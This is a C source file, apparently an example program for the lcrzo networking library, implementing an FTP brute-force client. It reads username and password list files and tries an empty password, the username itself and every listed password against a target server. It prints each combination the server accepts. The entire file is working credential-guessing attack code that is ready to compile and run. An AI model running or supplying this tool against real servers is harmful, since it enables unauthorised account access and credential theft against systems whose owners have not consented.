
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_http.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000268=
{ /*reference*/     "lcrzoex", 268,
  /*version*/       1, 0,
  /*title*/         "real tcp client [ftp brute force]",
  /*french title*/  "client tcp reel [brute force ftp]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.5 21 /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.5 21 /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000268_main(int argc, char *argv[]);
int lcrzoex_000268_ftp_brute(lcrzo_ipl ipl,
			     lcrzo_uint16 port,
			     lcrzo_conststring user,
			     lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000268_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_data data;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  int fduser, fdpass;

  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000268, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));
  port=(lcrzo_uint16)atoi(argv[2]);
  lcrzo_epr(lcrzo_fd_open_read(argv[3], &fduser));

  /* read each line of the files all try to access */  
  while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
  { user=data;
    user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_fd_open_read(argv[4], &fdpass));
    while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
    { pass=data;
      pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, pass));
      lcrzo_string_free(pass);
    }
    lcrzo_epr(lcrzo_fd_close(fdpass));
    lcrzo_string_free(user);
  }

  /* close */
  lcrzo_epr(lcrzo_fd_close(fduser));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000268_ftp_brute(lcrzo_ipl ipl,
			     lcrzo_uint16 port,
			     lcrzo_conststring user,
			     lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  lcrzo_sock sock;
  lcrzo_data data, error;
  lcrzo_int32 datasize, errorsize;
  lcrzo_uint16 num;
  int ret;

  /* open the connection */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));

  /* first, we read the banner */
  lcrzo_epr(lcrzo_sock_readm(&sock, LCRZO_TRUE, &data, &datasize));
  lcrzo_data_free(data);

  /* then, we send a 'USER' */
  lcrzo_epr(lcrzo_data_initm_text("USER ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(user, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(&sock, data, datasize));
  lcrzo_data_free(data);
  lcrzo_epr(shared_misc_verifyresponse1(&sock, 331));

  /* then, we send a 'PASS' */
  lcrzo_epr(lcrzo_data_initm_text("PASS ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(pass, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(&sock, data, datasize));
  lcrzo_data_free(data);
  ret=shared_misc_verifyresponse(&sock, 230, 230, 230, 230,
				 LCRZO_FALSE, &num, &error, &errorsize);
  error[errorsize]='\0';
  while ( strlen(error) && error[strlen(error)-1]==0x0A) 
    error[strlen(error)-1]='\0';
  while ( strlen(error) && error[strlen(error)-1]==0x0D) 
    error[strlen(error)-1]='\0';
  if ( ret==LCRZO_ERR_OK )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, num, error);
  }
  else if ( ret==LCRZOEX_ERR_MISC_BADRESPONSE )
  { numtest++;
    if (!(numtest%10)) printf("%ld passwd tried\n", numtest);
  }
  lcrzo_data_free(error);

  /* then, we send a 'QUIT' */
  lcrzo_epr(lcrzo_data_initm_text("QUIT\r\n", &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(&sock, data, datasize));
  lcrzo_data_free(data);
  lcrzo_epr(shared_misc_verifyresponse1(&sock, 221));

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



